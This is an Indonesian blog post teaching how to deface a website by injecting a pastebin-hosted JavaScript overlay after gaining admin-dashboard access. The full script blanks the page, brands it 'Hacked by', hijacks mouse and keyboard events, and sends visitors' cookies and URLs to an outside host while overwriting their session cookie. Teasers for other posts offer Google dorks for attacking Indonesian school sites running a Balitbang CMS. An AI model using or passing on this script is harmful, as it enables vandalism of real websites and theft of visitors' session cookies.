Tutorial Deface with JS Overlay (JSO)

By -
Pengertian Overlay sendiri di dalam dunia Blogging adalah teknik untuk memfokuskan pengunjung pada suatu elemen tertentu dengan cara menutupi konten utama dan menampilkan konten yang menjadi fokus utama. Bisa dikatakan kita menutupi sebuah halaman dengan script overlay tersebut.

Didalam dunia hacking sendiri JS Overlay bisa membantu kita ketika ingin mendeface suatu Website nampun sering kali gagal dala meng-upload sebuah backdoor, Teknik ini bisa mejadi salah satu solusinya.

Langsung saja ke tahap eksekusi. Saya anggap kalian sudah memiliki target website vuln yang ingin di eksekusi dengan JSO ini dengan persyaratan kalian sudah memasuki halaman dashboard Administrator.

Untuk script Javascript Overlay nya :
/*
<style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title="Hacked by Ngapak Crew"
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="http://i.imgur.com/QYUFm5u.png";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("hei admin.. you were hacked");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('Hacked by Ngapak Crew');
}
if(location.href.indexOf('sman2bangkalan.sch.id')==-1)setTimeout("alert('hei admin.. you were hacked');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='https://bacot.today/bacot.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="1337@null.net";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:black"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='https://bacot.today/bacot.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
}
}
}

Copast semua script di atas, kemudian paste di dalam pastebin.com, dan jangan lupa ganti kalimat Hacked by Ngapak Crew dengan Nick kalian. dan ganti url https://bacot.today/bacot.html dengan page halaman yang sudah kalian siapkan untuk menutupi halaman target/web korban.

Pada halaman dashboard kalian edit, biasanya dibagian main, slider, news ataupun halaman yang lainya. dengan script dibawah ini
<script type="text/javascript" src="https://pastebin.com/raw/UeU73MLZ"></script>
untuk https://pastebin.com/raw/UeU73MLZ  ganti dengan script pastebin yang sudah kalian buat di atas ok

Berikut cuplikan videonya tutorial Deface dengan teknik JSO :


Comments

Post a Comment

Popular posts from this blog

[BUG BOUNTY] Email Spoofing | No Valid SPF Record

By -
Image
Sekian lama tidak aktif ngeblog lagi, kali ini saya ingin sharing kembali mengenai salah satu celah yang saya temukan di salah satu website pembayaran elektronik lokal Indonesia. Vulnerability jenis apa yang saya temukan ? Awal mulanya saya melakukan footprinting dan melakukan information gathering dengan keinginan mendapatkan sebuah keberentungan, alhasil saya hanya menemukan sebuah file i.php yang menampilkan konfigurasi PHP yang dipakai pada web tersebut. Jika dilaporkan pun hanya akan dianggap sebagai "Information Disclosure". saya sempat berhenti sejenak sampai disini sampai ada teman saya yang memberikan sebuah link referensi mengenai email spoofing. Apa sih Email Spoofing itu ?  Email spoofing adalah pemalsuan pada bagian header email, sehingga email yang dikirim seolah-olah dikirimkan dari email yang valid. e-mail spoofing umumnya digunakan untuk aktivitas spamming, phishing atau fraud. Contoh email spoof biasanya dikirimkan dengan menyamarkan alamat email sebenarnya ...
Read more

Deface web with auto sql balitbang method

By -
Image
Assalamualaikum wr.wb Kali ini mimin akan mengshare cara mendeface di cms balitbang BAHAN 1. Shell Backdoor 2. Google chrome / browser 3. Hp / laptop 4. Tools auto sql balitbang  touch me senpai 5. Tools Crack Password sql balitbang  touch me senpai 6.  Dork / exploit: DorK BalitBang > inurl:/html/index.php site:sch.id  > inurl:/html/siswa site:sch.id  > inurl:/html/guru site:sch.id  > inurl:/html/alumni site:sch.id > inurl:member/daftar.php intext:NAMAKOTA > inurl:/sch.id Team balitbang intext:NAMAKOTA > intext:"Kamfret Team"sch.id Team Balitbang > inurl:/member/daftar.php > inurl:"/html/index.php" intext:"Tim Balitbang" > inurl:"/html/index.php" intitle:"Selamat Datang" > inurl:"/member/" intext:"Tim Balitbang" > inurl:"/html/siswa.php?" > inurl:"/html/alumni.php?" > inurl:"/html/guru.php?" > inurl:/member/daftar.php intext:"namakota...
Read more

Ike-Scan Tutorial - Information garhering (Kali Linux)

By -
Image
Halo teman teman,pada postingan kali ini saya akan memberikan tutorial cara menggunakan Ike-Scan sebelum itu akan saya jelaskan sedikit tentang apa itu Ike Scan? Ike Scan bukanlah alat yang begitu populer dikalangan umum, tetapi populer di kalangan pengguna pro dan pentester.tools ini tersedia untuk Windows dan Linux. Ini adalah proyek sumber terbuka yang tersedia secara gratis di internet. Teman teman juga dapat memodifikasi dan mengembangkannya di bawah lisensi GPL. IKE (Internet Key Exchange) Scan digunakan untuk menemukan host IKE dan juga mengambil sidik jarinya menggunakan pola backoff transmisi ulang. IKE Scan menemukan host yang dijalankan oleh IKE . Pemindaian IKE mengirimkan permintaan ke IKE dan menunjukkan host yang menanggapi permintaan dari IKE. Hal ini juga dilakukan Fingerprinting yang berarti menentukan pelaksanaan digunakan oleh host IKE. Ada beberapa cara untuk melakukan ini tetapi terutama menggunakan pola backoff transmisi ulang. Bagaimana Menggunakan IKE Scan? Jal...
Read more